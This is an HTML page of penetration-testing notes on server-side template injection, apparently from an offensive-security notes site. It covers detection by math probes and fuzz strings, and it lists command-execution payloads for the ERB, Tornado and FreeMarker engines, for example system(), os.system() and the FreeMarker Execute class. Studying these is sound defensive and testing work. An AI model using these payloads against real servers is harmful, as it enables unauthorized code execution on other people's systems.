<!DOCTYPE html>
<html lang="en-US">
<head>
<link rel="icon" type="image/x-icon" href="/conf/LOGO01.png">
<link rel="stylesheet" type="text/css" href="/conf/machete_style_offensive_sections.css">	
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script src="/conf/machete_conf.js"></script>
	
  <title> M A C H E T E </title>
  <!--------------------->
  <!-- b0ydC Founder -->
  <!-- --------------- -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta charset="utf-8" />

</head>
<body>
<br>
<a href="/index.html"><img src="/conf/letter_logo.jpg" alt="LOGO" style="width:20%;"></a>
<br>
<center>
<div style="font-size:24px; text-align:center; font-family:courier,monospace;">
    <a href="/offensive.html">OFFENSIVE</a> |
    <a href="/defensive.html">DEFENSIVE</a> |
    <a href="/tools.html">WIKI</a> |
<!-- <a href="/academy/platform.html">ACADEMY</a> | -->
    <a href="/about.html">ABOUT</a> 
</div> 
<p class="titulos"><mark>[SERVER-SIDE TEMPLATE INJECTION]</mark></p>
<div>
<pre>
<div class="column" style="display: inline-block; text-align: left; background-color:gray;">
<button onclick="document.location='/offensive/web_penetration_testing/server_side_attacks.html'" class="round" style="float: left;">&lt;&lt;</button><br><br>
<details>
<summary>GENERAL INFORMATION</summary>
first clue is XSS, normally after finding XSS no deep testing is performed and sometimes missed during black box engagements.
one good way to differentiate if SSTI is possible is to attempt normal/common operations, like sum, multiplication, etc.

not only XSS can lead to SSTI, also XXE.

typically arises through developers intentionally letting users submit or edit templates - some template engines offer a secure 
mode for this express purpose.

it may occur as a Local File Include (LFI) variant, exploitable through classic LFI techniques such as code embedded in log files, 
session files, or /proc/self/env
	
</details>	
<details>
<summary>IDENTIFICATION</summary>
high level

- find parameter that reflects
- test payloads (operational)
- find the template type/version
- execute payloads
	
1. detecting template injection

initial approach is to try fuzzing the template by injecting a sequence of special characters commonly used in template expressions, 
such as <b>${{<%[%'"}}%\</b>. If an exception is raised, this indicates that the injected template syntax is potentially being 
interpreted by the server in some way.	

Even if fuzzing did suggest a template injection vulnerability, you still need to identify its context in order to exploit it.

<b><u>for plaintext:</u></b>
Normal XSS attempts cannot provide evidence to SSTI, it will be needed some kind of operations, like {7*7}. If the result is 
49, it means the mathematical operation is evaluated on server side, confirming a potential SSTI vulnerability.

<b><u>for codecontext:</u></b>
it will render using variable/parameter, so one way to test if the template used is vulnerable is to attempt injecting HTML code
to a non-XSS vulnerable parameter, if it is reflected, it's could means the parameters are vulnerable to SSTI.

<b>SAMPLE:</b> http://vulnerable-website.com/?greeting=data.username&lt;tag&gt; | http://vulnerable-website.com/?greeting=data.username}}&lt;tag&gt;
	
2. detect template engine in use [it differs]

A common way of doing this is to inject arbitrary mathematical operations using syntax from different template engines.
check this site, https://portswigger.net/web-security/server-side-template-injection

3. read the documentation

</details>	
<details>
<summary>TEMPLATES ENGINES</summary>
<b> >> ERB</b>

it is pretty important to check the documentation, there you can find the different methods or functions that you can call to make the 
template execute operations.
	
common way to test, <b><%= 7*7 %></b>
common way to execute arbitrary commands, <b><%= system("cat /home/user/mo.txt") %></b>

<b> >> TORNADO</b>

template expressions are surrounded by {}, a simple way to test it is using the following: }}{{7*7}}
sometimes it is important to make post, or use the site to validate the user and information is valid. 

--> execute python in tornado ? how to do that ?

the "OS" module can be used to run/execute python on a TORNADO template. check the following code to run python.
you can mix commands to get the desired results, importing the OS module bring the chance to use or call OS commands in general.

{% import os %}{{os.system('cat /home/user/mo.txt')	

<b> >> FREEMARKER</b>
	
<b>code execution:</b> 

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
#{"freemarker.template.utility.Execute"?new()("id")}
[="freemarker.template.utility.Execute"?new()("id")]
	
</details>
</div>
</pre>
<button onclick="document.location='/offensive/web_penetration_testing/server_side_attacks.html'">GO BACK</button>
</div>
<p class="titulos">©® - 2023/2024.</p>
</center>
</body>
</html>
